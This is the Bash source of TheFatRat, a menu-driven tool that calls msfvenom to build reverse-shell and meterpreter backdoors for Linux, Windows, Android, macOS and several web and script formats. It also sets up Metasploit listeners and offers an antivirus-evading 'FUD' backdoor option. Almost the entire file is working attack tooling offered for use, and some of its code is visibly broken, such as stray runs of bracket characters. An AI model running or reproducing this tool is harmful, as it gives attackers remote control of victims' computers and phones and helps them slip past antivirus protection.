TheFatRat/fatrat

615 lines
23 KiB
Bash

#!/bin/bash
#============================================================================================================
# THEFATRAT
#
# Welcome and dont disclaimer
# fatrat Author By Edooo -maland-
# Tested On Kali Linux and Kali sana v.2
# contact me in screetsec@gmail.com
# Easy tool for generate backdoor with msfvenom ( part of metasploit framework )
# and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on
# a windows host Program to create a C program after it is compiled that will bypass most AV
#============================================================================================================
#This colour
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
#Checking
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
resize -s 30 73
clear
SERVICE=service;
#Check for gcc compiler
which i586-mingw32msvc-gcc >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo ""
COMPILER="i586-mingw32msvc-gcc"
else
which i686-w64-mingw32-gcc
if [ $? -eq 0 ]; then
echo ""
COMPILER="i686-w64-mingw32-gcc"
else
echo ""
echo -e "\e[01;31m[!]\e[00m Unable to find the required gcc program, install i586-mingw32msvc-gcc or i686-w64-mingw32-gcc (Arch) and try again"
echo""
echo "Do you want install mingw tool in the system for fix problem [Y/n]" ;
read bebe
if [ $bebe == "y" ] ;
then
apt-get update
clear
apt-get install mingw32
else
exit
fi
echo ""
exit 1
fi
fi
#########################
#CHECK DEPENDICS
#########################
echo -e $cyan" ____ _ _ _ "
echo " / ___| |__ ___ ___| | _(_)_ __ __ _ "
echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | "
echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ "
echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)"
echo " |___/ "
echo -e $lightgreen'-- -- +=[(c) 2016-2017 | DracOS | Linuxsec.org | Hacker Indonesia '
echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- '
echo -e " "
if [ $(id -u) != "0" ]; then
echo [!]::[Check Dependencies]: ;
sleep 2
echo [*]::[Check User]: $USER ;
sleep 1
echo [x]::[not root]: you need to be [root] to run this script.;
echo ""
sleep 1
exit
else
echo [!]::[Check Dependencies]: ;
sleep 1
echo [*]::[Check User]: $USER ;
fi
ping -c 1 google.com > /dev/null 2>&1
if [ "$?" != 0 ]
then
echo [*]::[Internet Connection]: DONE!;
echo [x]::[ warning ]: This Script Needs An Active Internet Connection;
sleep 2
else
echo [*]::[Internet Connection]: connected!;
sleep 2
fi
# check if msfvenom and metasploit installation exists
if [ -d $find ]; then
echo [*]::[msfvenom]: installation found!;
else
Colors;
echo [x]::[warning]:this script require m msfvenom installed to work ;
echo [!]::[please wait]: Downloading from network... ;
sleep 3
fi
sleep 3
clear
##############################
#CHECKING POSTGRESQL
#############################
if ps ax | grep -v grep | grep postgresql > /dev/null
then
clear
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $lightgreen" _ _ "
echo " ___ ___ _ ____ _(_) ___ ___ _ __ _ _ _ __ _ __ (_)_ __ __ _ "
echo " / __|/ _ \ '__\ \ / / |/ __/ _ \ | '__| | | | '_ \| '_ \| | '_ \ / _ |"
echo " \__ \ __/ | \ V /| | (_| __/ | | | |_| | | | | | | | | | | | (_| |"
echo " |___/\___|_| \_/ |_|\___\___| |_| \__ _|_| |_|_| |_|_|_| |_|\__, |"
echo " |___/ "
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
sleep 2
else
clear
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white"::::::::::::::::::::$white "Metasploit service is not running"$white ::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo ""
echo -e $white " /) "
echo " // "
echo " (( "
echo " // "
echo " .-. // .-. "
echo " / \- ((=-/ \ "
echo " \ \ / "
echo " -( ___ ))__)- "
echo " .-' // '-. "
echo " / (( \ "
echo " | * | "
echo " \ / "
echo " \ |_w_| / "
echo " _) \ / (_ "
echo " jgs (((---' '---))) "
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white":::::::::::::::: Wait for starting a Service Postgresql ::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
service postgresql start
read -p "Press [Enter] key to Continue..."
clear
fi
function cmsfvenom() {
clear
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Create Payload with msfvenom ( must install msfvenom ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo -e $red" ___________ "
echo -e " | |======[*** $yellow ____ _ "
echo -e $red" | $yellow MSFVENOM $red \ $yellow / ___|_ __ ___ ____| |_ ___ _ __ "
echo -e $red" |_____________\_______ $yellow | | | '__/ _ \/ _ | __/ _ \| '__|"
echo -e $red" |==[msf >]============\ $yellow | |___| | | __/ (_| | || (_) | | "
echo -e $red" |______________________\ $yellow \____|_| \___|\____|\__\___/|_| "
echo -e $yellow" \(@)(@)(@)(@)(@)(@)(@)/ "
echo -e $red" ********************* "
echo ""
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo""
echo -e $okegreen " [1] LINUX >> FatRat.ef"
echo -e " [2] WINDOWS >> FatRat.exe"
echo -e " [3] ANDROID >> FatRat.apk"
echo -e " [4] MAC >> FatRat.macho"
echo -e " [5] PHP >> FatRat.php"
echo -e " [6] ASP >> FatRat.asp"
echo -e " [7] JSP >> FatRat.jsp"
echo -e " [8] WAR >> FatRat.war"
echo -e " [9] Python >> FatRat.py "
echo -e " [10] Bash >> FatRat.sh"
echo -e " [11] Perl >> FatRat.pl"
echo -e " [12] Back to Menu "
echo -e " "
echo -n -e $red' \033[4mCreator$FATRAT:\033[0m>> '; tput sgr0 #insert your choice
read fatrat1
if test $fatrat1 == '1'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f elf > FatRat.elf
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '2'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f exe > FatRat.exe
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '3'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f apk > FatRat.apk
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '4'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > FatRat.macho
echo -e "Shell Saved To outputFolder "
elif test $fatrat1 == '5'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p php/meterpreter_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > FatRat.php
cat FatRat.php | pbcopy && echo '<?php ' | tr -d '\n' > FatRat.php && pbpaste >> FatRat.php
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '6'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > FatRat.asp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '7'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > FatRat.jsp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '8'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > FatRat.war
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '9'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > FatRat.py
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '10'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > FatRat.sh
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '11'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > FatRat.pl
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '12'
then
clear
menu
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) : "
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
cmsfvenom
fi
}
function clisteners() {
clear
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Create Listener with metasploit ( must install metasploit ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo
echo -e $yellow" _ _ _ ^__^ "
echo " | | (_)___ ___| |_ ___ _ __ ___ _ __ ___ (oo)\_______ "
echo " | | | / __|/ _ \ __/ _ \ '_ \ / _ \ '__/ __| (__)\ )\/\ "
echo " | |___| \__ \ __/ || __/ | | | __/ | \__ \ ||----w | "
echo " |_____|_|___/\___|\__\___|_| |_|\___|_| |___/ || || "
echo ""
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo ""
echo -e $okegreen" [1] Liseners for payload linux"
echo -e " [2] Liseners for payload Windows"
echo -e " [3] Liseners for payload Mac"
echo -e " [4] Liseners for payload Android"
echo -e " [5] Back to Menu "
echo -e " "
echo -n -e $red' \033[4mListeners$fatrat:\033[0m>> '; tput sgr0 #insert your choice
read fatrat1
if test $fatrat1 == '1' #LINUX
then
touch "temp/meterpreter_linux.rc"
echo use exploit/multi/handler > "temp/meterpreter_linux.rc"
echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> "temp/meterpreter_linux.rc"
echo -e $okegreen ""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_linux.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_linux.rc"
echo set ExitOnSession false >> "temp/meterpreter_linux.rc"
echo exploit -j >> "temp/meterpreter_linux.rc"
xterm -e msfconsole -r "temp/meterpreter_linux.rc" &
clear
elif test $fatrat1 == '2' #Windows
then
touch "temp/meterpreter_windows.rc"
echo use exploit/multi/handler > "temp/meterpreter_windows.rc"
echo set PAYLOAD windows/meterpreter/reverse_tcp >> "temp/meterpreter_windows.rc"
echo -e $okegreen ""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_windows.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_windows.rc"
echo set ExitOnSession false >> "temp/meterpreter_windows.rc"
echo exploit -j >> "temp/meterpreter_windows.rc"
xterm -e msfconsole -r "temp/meterpreter_windows.rc" &
clear
elif test $fatrat1 == '3' #Mac
then
touch "temp/meterpreter_mac.rc"
echo use exploit/multi/handler > "temp/meterpreter_mac.rc"
echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc"
echo -e $okegreen ""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_mac.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_mac.rc"
echo set ExitOnSession false >> "temp/meterpreter_mac.rc"
echo exploit -j >> "temp/meterpreter_mac.rc"
xterm -e msfconsole -r "temp/meterpreter_mac.rc" &
clear
elif test $fatrat1 == '4' #Android
then
touch "temp/meterpreter_android.rc"
echo use exploit/multi/handler > "temp/meterpreter_android.rc"
echo set PAYLOAD android/meterpreter/reverse_tcp >> "temp/meterpreter_android.rc"
echo -e $okegreen ""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_android.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_android.rc"
echo set ExitOnSession false >> "temp/meterpreter_android.rc"
echo exploit -j >> "temp/meterpreter_android.rc"
xterm -e msfconsole -r "temp/meterpreter_android.rc" &
clear
elif test $fatrat1 == '5'
then
clear
menu
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) : "
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
cmsfvenom
fi
}
#### credits
function credits {
clear
echo -e "
\033[31m##########################################################################\033[m
Credits To
\033[31m##########################################################################\033[m"
echo
echo -e $white "Special thanks to:"
echo
echo -e $red "Offensive Security for the awesome OS"
echo
echo -e $green "http://www.offensive-security.com/"
echo
echo -e $yellow "http://www.kali.org/"
echo
echo -e $cyan "http://www.kitploit.com/"
echo
echo -e $white "http://www.linuxsec.org/"
echo
echo -e $red "Big Thanks to : http://www.github.com/"
echo
}
###################################################################
# MENU FATRAT
###################################################################
menu () {
clear
echo -e $okegreen""
echo -e $okegreen" ____ "
echo -e $okegreen" | | "
echo -e $okegreen" |____| "
echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ "
echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ "
echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| "
echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| "
echo -e $okegreen" J \.|'.\/ \ "
echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] "
echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] "
echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Verson: $red"1.0" $white[$okegreen--$white] "
echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: Monody $white[$okegreen--$white] "
echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] "
echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] "
echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] "
echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] "
echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ "
echo
echo -e $white " "
echo -e $white" [$okegreen"1"$white]$okegreen CREATE BACKDOOR WITH MSFVENOM "
echo -e $white" [$okegreen"2"$white]$okegreen CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL ) "
echo -e $white" [$okegreen"3"$white]$okegreen CREATE A LISTENERS "
echo -e $white" [$okegreen"4"$white]$okegreen JUMP TO MSFCONSOLE "
echo -e $white" [$okegreen"5"$white]$okegreen SEARCHSPLOIT "
echo -e $white" [$okegreen"6"$white]$okegreen HELP "
echo -e $white" [$okegreen"7"$white]$okegreen CREDITS "
echo -e " "
echo -n -e $red' \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice
read fatrat
if test $fatrat == '1'
then
cmsfvenom
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm ./powerfull.sh
elif test $fatrat == '3'
then
clisteners
elif test $fatrat == '4'
then
xterm msfconsole
elif test $fatrat == '5'
then
clear
echo -e "\033[31mWhat do you want to Hack Today?\033[m"
echo -e "\033[31mEnter a search term and hit Enter\033[m"
read searchterm
gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2
menu
elif test $fatrat == '6'
then
firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md
elif test $fatrat == '7'
then
credits
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) :"
read back
if [ $back != 'n' ] && [ $back != 'N' ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
menu
fi
}
###################################################################
# MENU FATRAT
###################################################################
clear
echo -e $okegreen""
echo -e $okegreen" ____ "
echo -e $okegreen" | | "
echo -e $okegreen" |____| "
echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ "
echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ "
echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| "
echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| "
echo -e $okegreen" J \.|'.\/ \ "
echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] "
echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] "
echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Verson: $red"1.0" $white[$okegreen--$white] "
echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: Monody $white[$okegreen--$white] "
echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] "
echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] "
echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] "
echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] "
echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ "
echo
echo -e $white " "
echo -e $white" [$okegreen"1"$white]$okegreen CREATE BACKDOOR WITH MSFVENOM "
echo -e $white" [$okegreen"2"$white]$okegreen CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL ) "
echo -e $white" [$okegreen"3"$white]$okegreen CREATE A LISTENERS "
echo -e $white" [$okegreen"4"$white]$okegreen JUMP TO MSFCONSOLE "
echo -e $white" [$okegreen"5"$white]$okegreen SEARCHSPLOIT "
echo -e $white" [$okegreen"6"$white]$okegreen HELP "
echo -e $white" [$okegreen"7"$white]$okegreen CREDITS "
echo -e " "
echo -n -e $red' \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice
read fatrat
if test $fatrat == '1'
then
cmsfvenom
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm ./powerfull.sh
menu
elif test $fatrat == '3'
then
clisteners
elif test $fatrat == '4'
then
xterm msfconsole
menu
elif test $fatrat == '5'
then
clear
echo -e $okegreen"What do you want to Hack Today?"
echo -e "Enter a search term and hit Enter"
read searchterm
gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2
menu
elif test $fatrat == '6'
then
firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md
elif test $fatrat == '7'
then
credits
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) :"
read back
if [ $back != 'n' ] && [ $back != 'N' ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
menu
fi